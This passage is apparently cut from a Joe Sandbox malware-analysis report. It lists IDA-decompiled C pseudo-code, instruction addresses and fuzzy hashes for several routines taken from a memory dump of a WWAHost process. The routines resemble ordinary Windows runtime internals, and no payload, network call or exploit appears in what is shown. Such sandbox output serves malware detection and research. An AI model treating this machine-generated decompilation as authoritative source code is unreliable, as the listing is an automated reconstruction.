						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x3a453e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x3a453e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x393bc46;
						_t48 = E039D7B9C(0x3a453e8, 0x393bc46, _t67, 0x3a453e8, _t70,  &_v140);
					}
				}
				return E0399B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                              0x03998ec7
                                              0x03998ed9
                                              0x03998edc
                                              0x03998ee6
                                              0x03998ee9
                                              0x03998eee
                                              0x03998efc
                                              0x03998f08
                                              0x039d1349
                                              0x039d1353
                                              0x039d135d
                                              0x039d1366
                                              0x039d136f
                                              0x039d1375
                                              0x039d137c
                                              0x039d1385
                                              0x039d1390
                                              0x039d1391
                                              0x039d139c
                                              0x039d139d
                                              0x039d13a6
                                              0x039d13ac
                                              0x039d13b2
                                              0x039d13b5
                                              0x039d13bc
                                              0x039d13bf
                                              0x039d13c2
                                              0x039d13c5
                                              0x039d13c8
                                              0x039d13cb
                                              0x039d13ce
                                              0x039d13d1
                                              0x039d13d4
                                              0x039d13d7
                                              0x039d13da
                                              0x039d13dd
                                              0x039d13e0
                                              0x039d13e3
                                              0x039d13e6
                                              0x039d13e9
                                              0x039d13f6
                                              0x039d1400
                                              0x039d1400
                                              0x03998f08
                                              0x03998f32

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f672da355c108eb331eb0717685cf5ad4119bfc376406e33e2ed37fe30a73389
                                              • Instruction ID: 4e048d32ba46716608a78e1a5aa39edec3c10a0eeb55ca0ff99604c6d5f2f0bc
                                              • Opcode Fuzzy Hash: f672da355c108eb331eb0717685cf5ad4119bfc376406e33e2ed37fe30a73389
                                              • Instruction Fuzzy Hash: 6C419FB5D003189EDB60CFAAD981AADFBF8FB89710F5041AFE509A7200E7745A44CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0398E730 Relevance: .1, Instructions: 89COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 74%
                                              			E0398E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E03999670() < 0) {
					L039ADF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x3a47b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L03974620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0398E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                              0x0398e730
                                              0x0398e736
                                              0x0398e738
                                              0x0398e73d
                                              0x0398e73e
                                              0x0398e740
                                              0x0398e749
                                              0x0398e765
                                              0x0398e76a
                                              0x0398e76b
                                              0x0398e76c
                                              0x0398e76d
                                              0x0398e76e
                                              0x0398e76f
                                              0x0398e775
                                              0x0398e777
                                              0x0398e77e
                                              0x039cb675
                                              0x0398e784
                                              0x0398e784
                                              0x0398e789
                                              0x0398e7a8
                                              0x0398e7ac
                                              0x0398e807
                                              0x0398e7ae
                                              0x0398e7ae
                                              0x0398e7b1
                                              0x0398e7b4
                                              0x0398e7b9
                                              0x0398e7c0
                                              0x0398e7c4
                                              0x0398e7ca
                                              0x0398e7cc
                                              0x00000000
                                              0x0398e7d3
                                              0x0398e7d6
                                              0x00000000
                                              0x00000000
                                              0x0398e7ff
                                              0x0398e802
                                              0x00000000
                                              0x00000000
                                              0x0398e7f9
                                              0x0398e7fc
                                              0x00000000
                                              0x00000000
                                              0x0398e7f3
                                              0x0398e7f6
                                              0x00000000
                                              0x00000000
                                              0x0398e7ed
                                              0x0398e7f0
                                              0x00000000
                                              0x00000000
                                              0x0398e7e7
                                              0x0398e7ea
                                              0x00000000
                                              0x00000000
                                              0x039cb685
                                              0x039cb688
                                              0x00000000
                                              0x00000000
                                              0x039cb682
                                              0x00000000
                                              0x00000000
                                              0x0398e7cc
                                              0x0398e7d9
                                              0x0398e7dc
                                              0x0398e7de
                                              0x0398e7de
                                              0x0398e7ac
                                              0x0398e7e4
                                              0x0398e74b
                                              0x0398e751
                                              0x0398e759
                                              0x0398e761
                                              0x0398e761

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ca9e62ef741a19730c28ffc68f827e194b0585772d7fd24a3c98decd394b4a16
                                              • Instruction ID: e5af58353461fc506b77dafe29da4d047b749131d36c75780c3483b97054f261
                                              • Opcode Fuzzy Hash: ca9e62ef741a19730c28ffc68f827e194b0585772d7fd24a3c98decd394b4a16
                                              • Instruction Fuzzy Hash: CE318D75A14249EFD704DF18C851B9AB7E8FB49310F14865AF904CB341D731EC80CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0398BC2C Relevance: .1, Instructions: 88COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 67%
                                              			E0398BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x3a46100; // 0x1d
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E03972280(0xd, 0x1235f1a0);
				_t41 =  *0x3a460f8; // 0x0
				if(_t41 != 0) {
					 *0x3a460f8 =  *_t41;
					 *0x3a460fc =  *0x3a460fc + 0xffff;
				}
				E0396FFB0(_t41, 0x800, 0x1235f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x3a460f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L03974620(0x3a46100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x3a46100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                              0x0398bc36
                                              0x0398bc42
                                              0x0398bc45
                                              0x0398bc4a
                                              0x0398bd35
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0398bc50
                                              0x0398bc50
                                              0x0398bc58
                                              0x0398bc5a
                                              0x0398bc60
                                              0x00000000
                                              0x00000000
                                              0x039ca4f2
                                              0x039ca4f6
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039ca4fc
                                              0x0398bc79
                                              0x0398bc7e
                                              0x0398bc86
                                              0x0398bd16
                                              0x0398bd20
                                              0x0398bd20
                                              0x0398bc8d
                                              0x0398bc94
                                              0x0398bcbd
                                              0x0398bcca
                                              0x0398bccb
                                              0x0398bccc
                                              0x0398bccd
                                              0x0398bcce
                                              0x0398bcd4
                                              0x0398bcea
                                              0x0398bcee
                                              0x0398bcf2
                                              0x0398bd00
                                              0x0398bd04
                                              0x00000000
                                              0x0398bc96
                                              0x0398bcab
                                              0x0398bcaf
                                              0x0398bd2c
                                              0x0398bd2c
                                              0x0398bd09
                                              0x00000000
                                              0x0398bd09
                                              0x0398bcb1
                                              0x0398bcb5
                                              0x0398bcbb
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0398bcbb

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f3865226939d81e00e21852c8514304f85bd20caa749edb25d5ad9c78ee6d22a
                                              • Instruction ID: 3f812db43298eb71840efded18376c3e8ee3a3e41a24eaa9fa077668326603b0
                                              • Opcode Fuzzy Hash: f3865226939d81e00e21852c8514304f85bd20caa749edb25d5ad9c78ee6d22a
                                              • Instruction Fuzzy Hash: 7B31F07AA00616EBCB11FF58D4807A673A8FFD9314F084479ED48DB205EB75D90ACB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03959100 Relevance: .1, Instructions: 87COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 76%
                                              			E03959100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x3a2f6e8);
				E039AD0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E03A288F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E039AD130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x3a486c0; // 0xb507b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x3a486b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E03972280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E03A288F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0399AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x3a4b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x3a484c0;
										if(_t69 >=  *0x3a484c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E03A29063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0395922A(_t82);
							_t53 = E03977D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E03A28B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x3a486c0; // 0xb507b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x3a486b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x3a486bc;
										_t72 = 0x3a486b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E03959240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x3a486c4;
									_t72 = 0x3a486c0;
									L18:
									E03989B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                              0x03959100
                                              0x03959100
                                              0x03959100
                                              0x03959100
                                              0x03959102
                                              0x03959107
                                              0x0395910c
                                              0x03959110
                                              0x03959115
                                              0x03959136
                                              0x03959143
                                              0x039b37e4
                                              0x039b37e4
                                              0x03959149
                                              0x0395914e
                                              0x0395914e
                                              0x03959117
                                              0x0395911d
                                              0x00000000
                                              0x00000000
                                              0x0395911f
                                              0x03959125
                                              0x00000000
                                              0x03959151
                                              0x03959158
                                              0x0395915d
                                              0x03959161
                                              0x03959168
                                              0x039b3715
                                              0x00000000
                                              0x0395916e
                                              0x0395916e
                                              0x03959175
                                              0x03959177
                                              0x0395917e
                                              0x0395917f
                                              0x03959182
                                              0x03959182
                                              0x03959187
                                              0x03959187
                                              0x0395918a
                                              0x0395918d
                                              0x0395918f
                                              0x03959192
                                              0x03959195
                                              0x03959198
                                              0x03959198
                                              0x03959198
                                              0x0395919a
                                              0x00000000
                                              0x00000000
                                              0x039b371f
                                              0x039b3721
                                              0x039b3727
                                              0x039b372f
                                              0x039b3733
                                              0x039b3735
                                              0x039b3738
                                              0x039b373b
                                              0x039b373d
                                              0x039b3740
                                              0x00000000
                                              0x00000000
                                              0x039b3746
                                              0x039b3749
                                              0x00000000
                                              0x00000000
                                              0x039b374f
                                              0x039b3751
                                              0x00000000
                                              0x00000000
                                              0x039b3757
                                              0x039b3759
                                              0x039b375c
                                              0x039b375c
                                              0x039b375e
                                              0x039b375e
                                              0x039b3761
                                              0x039b3764
                                              0x00000000
                                              0x00000000
                                              0x039b3766
                                              0x039b3768
                                              0x039b37a3
                                              0x039b37a3
                                              0x039b37a5
                                              0x039b37a7
                                              0x039b37ad
                                              0x039b37b0
                                              0x039b37b2
                                              0x039b37bc
                                              0x039b37c2
                                              0x039b37c2
                                              0x039b37b2
                                              0x03959187
                                              0x03959187
                                              0x0395918a
                                              0x0395918d
                                              0x0395918f
                                              0x03959192
                                              0x03959195
                                              0x00000000
                                              0x03959195
                                              0x00000000
                                              0x03959187
                                              0x039b376a
                                              0x039b376a
                                              0x039b376c
                                              0x039b376c
                                              0x039b376f
                                              0x039b3775
                                              0x00000000
                                              0x00000000
                                              0x039b3777
                                              0x039b3779
                                              0x00000000
                                              0x00000000
                                              0x039b3782
                                              0x039b3787
                                              0x039b3789
                                              0x039b3790
                                              0x039b3790
                                              0x039b378b
                                              0x039b378b
                                              0x039b378b
                                              0x039b3792
                                              0x039b3795
                                              0x039b3795
                                              0x039b3798
                                              0x039b3798
                                              0x039b379b
                                              0x039b379b
                                              0x039591a3
                                              0x039591a9
                                              0x039591b0
                                              0x039591b4
                                              0x039591b4
                                              0x039591bb
                                              0x039591c0
                                              0x039591c5
                                              0x039591c7
                                              0x039b37da
                                              0x039591cd
                                              0x039591cd
                                              0x039591cd
                                              0x039591d2
                                              0x039591d5
                                              0x03959239
                                              0x03959239
                                              0x039591d7
                                              0x039591db
                                              0x039591e1
                                              0x039591e7
                                              0x039591fd
                                              0x03959203
                                              0x0395921e
                                              0x03959223
                                              0x00000000
                                              0x03959223
                                              0x03959205
                                              0x03959208
                                              0x0395920c
                                              0x03959214
                                              0x03959214
                                              0x039591e9
                                              0x039591e9
                                              0x039591ee
                                              0x039591f3
                                              0x039591f3
                                              0x039591f3
                                              0x039591e7
                                              0x00000000
                                              0x039591db
                                              0x03959187
                                              0x03959168

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 67c2f49473634b63b1b599421200cdd0baef2973b2a6c667d036ebae10d59943
                                              • Instruction ID: d83c312a486836d515e1b9fdccd1e4f86c059930eb5b8c16bd62188ce5adc0ca
                                              • Opcode Fuzzy Hash: 67c2f49473634b63b1b599421200cdd0baef2973b2a6c667d036ebae10d59943
                                              • Instruction Fuzzy Hash: 4A31D879900755DFEB25DB6CC58879DFBF9BB85390F1C8149E8056B240C339A9C0CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03981DB5 Relevance: .1, Instructions: 87COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 60%
                                              			E03981DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0397F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L03974620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0397F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                              0x03981dc2
                                              0x03981dc5
                                              0x03981dc7
                                              0x03981dcc
                                              0x03981dce
                                              0x03981dd6
                                              0x03981ddf
                                              0x03981de0
                                              0x03981de1
                                              0x03981de5
                                              0x03981de8
                                              0x03981def
                                              0x03981df0
                                              0x03981df6
                                              0x03981df7
                                              0x03981dfe
                                              0x03981e1a
                                              0x00000000
                                              0x00000000
                                              0x03981e0b
                                              0x03981e12
                                              0x03981e12
                                              0x03981e00
                                              0x03981e00
                                              0x03981e05
                                              0x03981e1e
                                              0x03981e23
                                              0x039c570f
                                              0x039c5713
                                              0x00000000
                                              0x00000000
                                              0x039c5719
                                              0x039c5719
                                              0x03981e2c
                                              0x03981e2d
                                              0x03981e2e
                                              0x03981e2f
                                              0x03981e31
                                              0x03981e32
                                              0x03981e35
                                              0x03981e3d
                                              0x039c5723
                                              0x039c573d
                                              0x039c573d
                                              0x00000000
                                              0x039c5723
                                              0x03981e49
                                              0x03981e4e
                                              0x03981e4e
                                              0x03981e09
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                              • Instruction ID: 229719d66424aa466da573bc0b337b2b59bf2b82dad45802860748b93331cf3a
                                              • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                              • Instruction Fuzzy Hash: 92219C76600218EBC720EF99CC84EAAFBBDFFC5680F154055E901DB261D630AE02CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03970050 Relevance: .1, Instructions: 81COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 53%
                                              			E03970050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x3a4d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E03989ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0399B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E03A28A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E03989702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x3a4b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                              0x03970055
                                              0x0397005d
                                              0x03970062
                                              0x0397006c
                                              0x0397006f
                                              0x03970074
                                              0x0397007a
                                              0x0397007a
                                              0x03970080
                                              0x03970080
                                              0x03970087
                                              0x0397008d
                                              0x0397008f
                                              0x03970093
                                              0x03970095
                                              0x0397009b
                                              0x039700f8
                                              0x039700fb
                                              0x039700fc
                                              0x039700ff
                                              0x03970108
                                              0x03970108
                                              0x039700a2
                                              0x039700a6
                                              0x039700b3
                                              0x039700bc
                                              0x039700c5
                                              0x039700ca
                                              0x039bc01e
                                              0x00000000
                                              0x00000000
                                              0x039bc02d
                                              0x039700d5
                                              0x039700d9
                                              0x039bc03d
                                              0x039bc046
                                              0x039bc046
                                              0x039700df
                                              0x039700e2
                                              0x039700ea
                                              0x039700ef
                                              0x039700f2
                                              0x039700f6
                                              0x03970111
                                              0x03970117
                                              0x03970117
                                              0x00000000
                                              0x039700f6
                                              0x039700d0
                                              0x039700d0
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
